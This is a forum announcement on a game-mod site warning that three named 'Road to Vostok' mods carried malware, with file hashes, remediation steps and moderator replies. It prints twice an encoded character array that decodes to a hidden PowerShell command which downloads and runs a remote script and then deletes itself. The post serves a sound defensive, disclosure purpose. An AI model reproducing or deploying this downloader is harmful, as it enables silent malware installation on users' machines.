logo
GamesRoad to VostokForumNewsAttention about malware in mods
Road to Vostok
Upload Mod Mods Forum
📢 Attention about malware in mods

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next? We are going to look for moderators to look at new mods for RTV. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229. What can you do Again if you are infected, factory reset your computer. Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34] Check file hash of the file you downloaded using: https://hash-file.online. Any mod containing powershell script without a good reason should be reported to moderators. Any mod that isn't open-source should be reported.
Attention about malware in mods
Avatar
LuffyManagement
18 hours ago(Edited)

If you had installed the following mods:

"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)

Your PC is likely infected with a malware. Do a proper reset to your computer.

What are we gonna do next?

  1. We are going to look for moderators to look at new mods for RTV.
  2. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.

What can you do

  • Again if you are infected, factory reset your computer.
  • Search for suspicious things in the mods you download (like "powershell")
    These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
    [64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34]
  • Check file hash of the file you downloaded using: https://hash-file.online.
  • Any mod containing powershell script without a good reason should be reported to moderators.
  • Any mod that isn't open-source should be reported.
Replies
Return to Replies Subscribe
Avatar
petermaster.
8 hours ago

Is there any way to prevent this kind of thing from continuing to happen? Are mod files scanned before authors upload them?

Avatar
LuffyManagement
(Poster)7 hours ago(Edited)

Generally no, but we have moderators that actively look at mods and reports.

  • While in this case virustotal couldn't detect anything, you can try scanning it through virustotal just in case.
  • Search for suspicious things in the code, like "powershell" there's little reason for mods to run OS.execute
  • Look if the user isn't too new and has track record of uploading working mods over time. Github Repo is a usually a sign of a legit user.
    One of the banned users was an account from 2023 so it's not impossible for them to have dormant accounts on sites.
  • Ask around the community if a mod seems sus, AI can also detect fishy code.

In the end if you find a mod is malicious, report it.

Avatar
petermaster.
5 hours ago

@luffy Your explanation was very detailed. If I come across any malicious mods, I’ll make sure to report them. Thank you for your work and dedication.

62 1711
We Use Cookies 🍪We use cookies to improve your user experience. Will you allow us to store them?
Cookie Policy